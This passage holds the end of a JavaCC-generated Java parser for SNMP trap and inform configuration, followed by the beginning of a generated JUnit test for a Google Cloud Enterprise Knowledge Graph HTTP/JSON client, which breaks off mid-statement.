ParseException { /*@bgen(jjtree) TrapCommunity */ JDMTrapCommunity jjtn000 = new JDMTrapCommunity(JJTTRAPCOMMUNITY); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { jj_consume_token(TRAPCOMMUNITY); jj_consume_token(ASSIGN); t = jj_consume_token(IDENTIFIER); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.community= t.image; {if (true) return jjtn000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void TrapInterestedHost() throws ParseException { /*@bgen(jjtree) TrapInterestedHost */ JDMTrapInterestedHost jjtn000 = new JDMTrapInterestedHost(JJTTRAPINTERESTEDHOST); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(HOSTS); jj_consume_token(ASSIGN); HostTrap(); label_10: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[15] = jj_gen; break label_10; } jj_consume_token(COMMA); HostTrap(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void HostTrap() throws ParseException { /*@bgen(jjtree) HostTrap */ JDMHostTrap jjtn000 = new JDMHostTrap(JJTHOSTTRAP); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case IDENTIFIER: HostName(); break; case INTEGER_LITERAL: IpAddress(); break; case V6_ADDRESS: IpV6Address(); break; default: jj_la1[16] = jj_gen; jj_consume_token(-1); throw new ParseException(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void Enterprise() throws ParseException { /*@bgen(jjtree) Enterprise */ JDMEnterprise jjtn000 = new JDMEnterprise(JJTENTERPRISE); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { jj_consume_token(LBRACE); jj_consume_token(ENTERPRISE); jj_consume_token(ASSIGN); t = jj_consume_token(CSTRING); jjtn000.enterprise= t.image; jj_consume_token(TRAPNUM); jj_consume_token(ASSIGN); TrapNum(); label_11: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[17] = jj_gen; break label_11; } jj_consume_token(COMMA); TrapNum(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void TrapNum() throws ParseException { /*@bgen(jjtree) TrapNum */ JDMTrapNum jjtn000 = new JDMTrapNum(JJTTRAPNUM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.low= Integer.parseInt(t.image); switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case RANGE: jj_consume_token(RANGE); t = jj_consume_token(INTEGER_LITERAL); jjtn000.high= Integer.parseInt(t.image); break; default: jj_la1[18] = jj_gen; ; } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void InformBlock() throws ParseException { /*@bgen(jjtree) InformBlock */ JDMInformBlock jjtn000 = new JDMInformBlock(JJTINFORMBLOCK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(INFORM); jj_consume_token(ASSIGN); jj_consume_token(LBRACE); label_12: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[19] = jj_gen; break label_12; } InformItem(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void InformItem() throws ParseException { /*@bgen(jjtree) InformItem */ JDMInformItem jjtn000 = new JDMInformItem(JJTINFORMITEM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(LBRACE); jjtn000.comm = InformCommunity(); InformInterestedHost(); jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMInformCommunity InformCommunity() throws ParseException { /*@bgen(jjtree) InformCommunity */ JDMInformCommunity jjtn000 = new JDMInformCommunity(JJTINFORMCOMMUNITY); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { jj_consume_token(INFORMCOMMUNITY); jj_consume_token(ASSIGN); t = jj_consume_token(IDENTIFIER); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.community= t.image; {if (true) return jjtn000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void InformInterestedHost() throws ParseException { /*@bgen(jjtree) InformInterestedHost */ JDMInformInterestedHost jjtn000 = new JDMInformInterestedHost(JJTINFORMINTERESTEDHOST); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(HOSTS); jj_consume_token(ASSIGN); HostInform(); label_13: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[20] = jj_gen; break label_13; } jj_consume_token(COMMA); HostInform(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void HostInform() throws ParseException { /*@bgen(jjtree) HostInform */ JDMHostInform jjtn000 = new JDMHostInform(JJTHOSTINFORM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case IDENTIFIER: HostName(); break; case INTEGER_LITERAL: IpAddress(); break; case V6_ADDRESS: IpV6Address(); break; default: jj_la1[21] = jj_gen; jj_consume_token(-1); throw new ParseException(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final private boolean jj_2_1(int xla) { jj_la = xla; jj_lastpos = jj_scanpos = token; boolean retval = !jj_3_1(); jj_save(0, xla); return retval; } final private boolean jj_2_2(int xla) { jj_la = xla; jj_lastpos = jj_scanpos = token; boolean retval = !jj_3_2(); jj_save(1, xla); return retval; } final private boolean jj_2_3(int xla) { jj_la = xla; jj_lastpos = jj_scanpos = token; boolean retval = !jj_3_3(); jj_save(2, xla); return retval; } final private boolean jj_3_3() { if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(DOT)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } final private boolean jj_3_2() { if (jj_scan_token(V6_ADDRESS)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(MASK)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } final private boolean jj_3_1() { if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; Token xsp; while (true) { xsp = jj_scanpos; if (jj_3R_14()) { jj_scanpos = xsp; break; } if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; } if (jj_scan_token(MASK)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } final private boolean jj_3R_14() { if (jj_scan_token(DOT)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } public ParserTokenManager token_source; ASCII_CharStream jj_input_stream; public Token token, jj_nt; private int jj_ntk; private Token jj_scanpos, jj_lastpos; private int jj_la; public boolean lookingAhead = false; private boolean jj_semLA; private int jj_gen; final private int[] jj_la1 = new int[22]; final private int[] jj_la1_0 = {0x100,0x80000,0x100000,0x2000,0x0,0x60000,0x0,0x80000000,0x11000000,0x0,0x0,0x0,0x0,0x2000,0x2000,0x0,0x91000000,0x0,0x8000,0x2000,0x0,0x91000000,}; final private int[] jj_la1_1 = {0x0,0x0,0x0,0x0,0x10,0x0,0x10,0x0,0x0,0x20,0x20,0x40,0x20,0x0,0x0,0x10,0x0,0x10,0x0,0x0,0x10,0x0,}; final private JJCalls[] jj_2_rtns = new JJCalls[3]; private boolean jj_rescan = false; private int jj_gc = 0; public Parser(java.io.InputStream stream) { jj_input_stream = new ASCII_CharStream(stream, 1, 1); token_source = new ParserTokenManager(jj_input_stream); token = new Token(); jj_ntk = -1; jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public void ReInit(java.io.InputStream stream) { jj_input_stream.ReInit(stream, 1, 1); token_source.ReInit(jj_input_stream); token = new Token(); jj_ntk = -1; jjtree.reset(); jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public Parser(java.io.Reader stream) { jj_input_stream = new ASCII_CharStream(stream, 1, 1); token_source = new ParserTokenManager(jj_input_stream); token = new Token(); jj_ntk = -1; jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public void ReInit(java.io.Reader stream) { jj_input_stream.ReInit(stream, 1, 1); token_source.ReInit(jj_input_stream); token = new Token(); jj_ntk = -1; jjtree.reset(); jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public Parser(ParserTokenManager tm) { token_source = tm; token = new Token(); jj_ntk = -1; jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } public void ReInit(ParserTokenManager tm) { token_source = tm; token = new Token(); jj_ntk = -1; jjtree.reset(); jj_gen = 0; for (int i = 0; i < 22; i++) jj_la1[i] = -1; for (int i = 0; i < jj_2_rtns.length; i++) jj_2_rtns[i] = new JJCalls(); } final private Token jj_consume_token(int kind) throws ParseException { Token oldToken; if ((oldToken = token).next != null) token = token.next; else token = token.next = token_source.getNextToken(); jj_ntk = -1; if (token.kind == kind) { jj_gen++; if (++jj_gc > 100) { jj_gc = 0; for (int i = 0; i < jj_2_rtns.length; i++) { JJCalls c = jj_2_rtns[i]; while (c != null) { if (c.gen < jj_gen) c.first = null; c = c.next; } } } return token; } token = oldToken; jj_kind = kind; throw generateParseException(); } final private boolean jj_scan_token(int kind) { if (jj_scanpos == jj_lastpos) { jj_la--; if (jj_scanpos.next == null) { jj_lastpos = jj_scanpos = jj_scanpos.next = token_source.getNextToken(); } else { jj_lastpos = jj_scanpos = jj_scanpos.next; } } else { jj_scanpos = jj_scanpos.next; } if (jj_rescan) { int i = 0; Token tok = token; while (tok != null && tok != jj_scanpos) { i++; tok = tok.next; } if (tok != null) jj_add_error_token(kind, i); } return (jj_scanpos.kind != kind); } final public Token getNextToken() { if (token.next != null) token = token.next; else token = token.next = token_source.getNextToken(); jj_ntk = -1; jj_gen++; return token; } final public Token getToken(int index) { Token t = lookingAhead ? jj_scanpos : token; for (int i = 0; i < index; i++) { if (t.next != null) t = t.next; else t = t.next = token_source.getNextToken(); } return t; } final private int jj_ntk() { if ((jj_nt=token.next) == null) return (jj_ntk = (token.next=token_source.getNextToken()).kind); else return (jj_ntk = jj_nt.kind); } private java.util.Vector<int[]> jj_expentries = new java.util.Vector<>(); private int[] jj_expentry; private int jj_kind = -1; private int[] jj_lasttokens = new int[100]; private int jj_endpos; private void jj_add_error_token(int kind, int pos) { if (pos >= 100) return; if (pos == jj_endpos + 1) { jj_lasttokens[jj_endpos++] = kind; } else if (jj_endpos != 0) { jj_expentry = new int[jj_endpos]; for (int i = 0; i < jj_endpos; i++) { jj_expentry[i] = jj_lasttokens[i]; } boolean exists = false; for (java.util.Enumeration<int[]> enumv = jj_expentries.elements(); enumv.hasMoreElements();) { int[] oldentry = enumv.nextElement(); if (oldentry.length == jj_expentry.length) { exists = true; for (int i = 0; i < jj_expentry.length; i++) { if (oldentry[i] != jj_expentry[i]) { exists = false; break; } } if (exists) break; } } if (!exists) jj_expentries.addElement(jj_expentry); if (pos != 0) jj_lasttokens[(jj_endpos = pos) - 1] = kind; } } final public ParseException generateParseException() { jj_expentries.removeAllElements(); boolean[] la1tokens = new boolean[40]; for (int i = 0; i < 40; i++) { la1tokens[i] = false; } if (jj_kind >= 0) { la1tokens[jj_kind] = true; jj_kind = -1; } for (int i = 0; i < 22; i++) { if (jj_la1[i] == jj_gen) { for (int j = 0; j < 32; j++) { if ((jj_la1_0[i] & (1<<j)) != 0) { la1tokens[j] = true; } if ((jj_la1_1[i] & (1<<j)) != 0) { la1tokens[32+j] = true; } } } } for (int i = 0; i < 40; i++) { if (la1tokens[i]) { jj_expentry = new int[1]; jj_expentry[0] = i; jj_expentries.addElement(jj_expentry); } } jj_endpos = 0; jj_rescan_token(); jj_add_error_token(0, 0); int[][] exptokseq = new int[jj_expentries.size()][]; for (int i = 0; i < jj_expentries.size(); i++) { exptokseq[i] = jj_expentries.elementAt(i); } return new ParseException(token, exptokseq, tokenImage); } final public void enable_tracing() { } final public void disable_tracing() { } final private void jj_rescan_token() { jj_rescan = true; for (int i = 0; i < 3; i++) { JJCalls p = jj_2_rtns[i]; do { if (p.gen > jj_gen) { jj_la = p.arg; jj_lastpos = jj_scanpos = p.first; switch (i) { case 0: jj_3_1(); break; case 1: jj_3_2(); break; case 2: jj_3_3(); break; } } p = p.next; } while (p != null); } jj_rescan = false; } final private void jj_save(int index, int xla) { JJCalls p = jj_2_rtns[index]; while (p.gen > jj_gen) { if (p.next == null) { p = p.next = new JJCalls(); break; } p = p.next; } p.gen = jj_gen + xla - jj_la; p.first = token; p.arg = xla; } static final class JJCalls { int gen; Token first; int arg; JJCalls next; } }
googleapis/google-cloud-java
35,669
java-enterpriseknowledgegraph/google-cloud-enterpriseknowledgegraph/src/test/java/com/google/cloud/enterpriseknowledgegraph/v1/EnterpriseKnowledgeGraphServiceClientHttpJsonTest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.enterpriseknowledgegraph.v1; import static com.google.cloud.enterpriseknowledgegraph.v1.EnterpriseKnowledgeGraphServiceClient.ListEntityReconciliationJobsPagedResponse; import com.google.api.gax.core.NoCredentialsProvider; import com.google.api.gax.httpjson.GaxHttpJsonProperties; import com.google.api.gax.httpjson.testing.MockHttpService; import com.google.api.gax.rpc.ApiClientHeaderProvider; import com.google.api.gax.rpc.ApiException; import com.google.api.gax.rpc.ApiExceptionFactory; import com.google.api.gax.rpc.InvalidArgumentException; import com.google.api.gax.rpc.StatusCode; import com.google.api.gax.rpc.testing.FakeStatusCode; import com.google.cloud.enterpriseknowledgegraph.v1.stub.HttpJsonEnterpriseKnowledgeGraphServiceStub; import com.google.common.collect.Lists; import com.google.protobuf.Empty; import com.google.protobuf.ListValue; import com.google.protobuf.Timestamp; import com.google.protobuf.Value; import com.google.rpc.Status; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import javax.annotation.Generated; import org.junit.After; import org.junit.AfterClass; import org.junit.Assert; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; @Generated("by gapic-generator-java") public class EnterpriseKnowledgeGraphServiceClientHttpJsonTest { private static MockHttpService mockService; private static EnterpriseKnowledgeGraphServiceClient client; @BeforeClass public static void startStaticServer() throws IOException { mockService = new MockHttpService( HttpJsonEnterpriseKnowledgeGraphServiceStub.getMethodDescriptors(), EnterpriseKnowledgeGraphServiceSettings.getDefaultEndpoint()); EnterpriseKnowledgeGraphServiceSettings settings = EnterpriseKnowledgeGraphServiceSettings.newHttpJsonBuilder() .setTransportChannelProvider( EnterpriseKnowledgeGraphServiceSettings.defaultHttpJsonTransportProviderBuilder() .setHttpTransport(mockService) .build()) .setCredentialsProvider(NoCredentialsProvider.create()) .build(); client = EnterpriseKnowledgeGraphServiceClient.create(settings); } @AfterClass public static void stopServer() { client.close(); } @Before public void setUp() {} @After public void tearDown() throws Exception { mockService.reset(); } @Test public void createEntityReconciliationJobTest() throws Exception { EntityReconciliationJob expectedResponse = EntityReconciliationJob.newBuilder() .setName( EntityReconciliationJobName.of( "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]") .toString()) .setInputConfig(InputConfig.newBuilder().build()) .setOutputConfig(OutputConfig.newBuilder().build()) .setState(JobState.forNumber(0)) .setError(Status.newBuilder().build()) .setCreateTime(Timestamp.newBuilder().build()) .setEndTime(Timestamp.newBuilder().build()) .setUpdateTime(Timestamp.newBuilder().build()) .setReconConfig(ReconConfig.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); EntityReconciliationJob entityReconciliationJob = EntityReconciliationJob.newBuilder().build(); EntityReconciliationJob actualResponse = client.createEntityReconciliationJob(parent, entityReconciliationJob); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void createEntityReconciliationJobExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); EntityReconciliationJob entityReconciliationJob = EntityReconciliationJob.newBuilder().build(); client.createEntityReconciliationJob(parent, entityReconciliationJob); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void createEntityReconciliationJobTest2() throws Exception { EntityReconciliationJob expectedResponse = EntityReconciliationJob.newBuilder() .setName( EntityReconciliationJobName.of( "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]") .toString()) .setInputConfig(InputConfig.newBuilder().build()) .setOutputConfig(OutputConfig.newBuilder().build()) .setState(JobState.forNumber(0)) .setError(Status.newBuilder().build()) .setCreateTime(Timestamp.newBuilder().build()) .setEndTime(Timestamp.newBuilder().build()) .setUpdateTime(Timestamp.newBuilder().build()) .setReconConfig(ReconConfig.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; EntityReconciliationJob entityReconciliationJob = EntityReconciliationJob.newBuilder().build(); EntityReconciliationJob actualResponse = client.createEntityReconciliationJob(parent, entityReconciliationJob); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void createEntityReconciliationJobExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; EntityReconciliationJob entityReconciliationJob = EntityReconciliationJob.newBuilder().build(); client.createEntityReconciliationJob(parent, entityReconciliationJob); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void getEntityReconciliationJobTest() throws Exception { EntityReconciliationJob expectedResponse = EntityReconciliationJob.newBuilder() .setName( EntityReconciliationJobName.of( "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]") .toString()) .setInputConfig(InputConfig.newBuilder().build()) .setOutputConfig(OutputConfig.newBuilder().build()) .setState(JobState.forNumber(0)) .setError(Status.newBuilder().build()) .setCreateTime(Timestamp.newBuilder().build()) .setEndTime(Timestamp.newBuilder().build()) .setUpdateTime(Timestamp.newBuilder().build()) .setReconConfig(ReconConfig.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); EntityReconciliationJobName name = EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]"); EntityReconciliationJob actualResponse = client.getEntityReconciliationJob(name); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void getEntityReconciliationJobExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { EntityReconciliationJobName name = EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]"); client.getEntityReconciliationJob(name); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void getEntityReconciliationJobTest2() throws Exception { EntityReconciliationJob expectedResponse = EntityReconciliationJob.newBuilder() .setName( EntityReconciliationJobName.of( "[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]") .toString()) .setInputConfig(InputConfig.newBuilder().build()) .setOutputConfig(OutputConfig.newBuilder().build()) .setState(JobState.forNumber(0)) .setError(Status.newBuilder().build()) .setCreateTime(Timestamp.newBuilder().build()) .setEndTime(Timestamp.newBuilder().build()) .setUpdateTime(Timestamp.newBuilder().build()) .setReconConfig(ReconConfig.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String name = "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188"; EntityReconciliationJob actualResponse = client.getEntityReconciliationJob(name); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void getEntityReconciliationJobExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String name = "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188"; client.getEntityReconciliationJob(name); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void listEntityReconciliationJobsTest() throws Exception { EntityReconciliationJob responsesElement = EntityReconciliationJob.newBuilder().build(); ListEntityReconciliationJobsResponse expectedResponse = ListEntityReconciliationJobsResponse.newBuilder() .setNextPageToken("") .addAllEntityReconciliationJobs(Arrays.asList(responsesElement)) .build(); mockService.addResponse(expectedResponse); LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); ListEntityReconciliationJobsPagedResponse pagedListResponse = client.listEntityReconciliationJobs(parent); List<EntityReconciliationJob> resources = Lists.newArrayList(pagedListResponse.iterateAll()); Assert.assertEquals(1, resources.size()); Assert.assertEquals( expectedResponse.getEntityReconciliationJobsList().get(0), resources.get(0)); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void listEntityReconciliationJobsExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]"); client.listEntityReconciliationJobs(parent); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void listEntityReconciliationJobsTest2() throws Exception { EntityReconciliationJob responsesElement = EntityReconciliationJob.newBuilder().build(); ListEntityReconciliationJobsResponse expectedResponse = ListEntityReconciliationJobsResponse.newBuilder() .setNextPageToken("") .addAllEntityReconciliationJobs(Arrays.asList(responsesElement)) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; ListEntityReconciliationJobsPagedResponse pagedListResponse = client.listEntityReconciliationJobs(parent); List<EntityReconciliationJob> resources = Lists.newArrayList(pagedListResponse.iterateAll()); Assert.assertEquals(1, resources.size()); Assert.assertEquals( expectedResponse.getEntityReconciliationJobsList().get(0), resources.get(0)); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void listEntityReconciliationJobsExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; client.listEntityReconciliationJobs(parent); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void cancelEntityReconciliationJobTest() throws Exception { Empty expectedResponse = Empty.newBuilder().build(); mockService.addResponse(expectedResponse); EntityReconciliationJobName name = EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]"); client.cancelEntityReconciliationJob(name); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void cancelEntityReconciliationJobExceptionTest() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { EntityReconciliationJobName name = EntityReconciliationJobName.of("[PROJECT]", "[LOCATION]", "[ENTITY_RECONCILIATION_JOB]"); client.cancelEntityReconciliationJob(name); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } @Test public void cancelEntityReconciliationJobTest2() throws Exception { Empty expectedResponse = Empty.newBuilder().build(); mockService.addResponse(expectedResponse); String name = "projects/project-4188/locations/location-4188/entityReconciliationJobs/entityReconciliationJob-4188"; client.cancelEntityReconciliationJob(name); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) 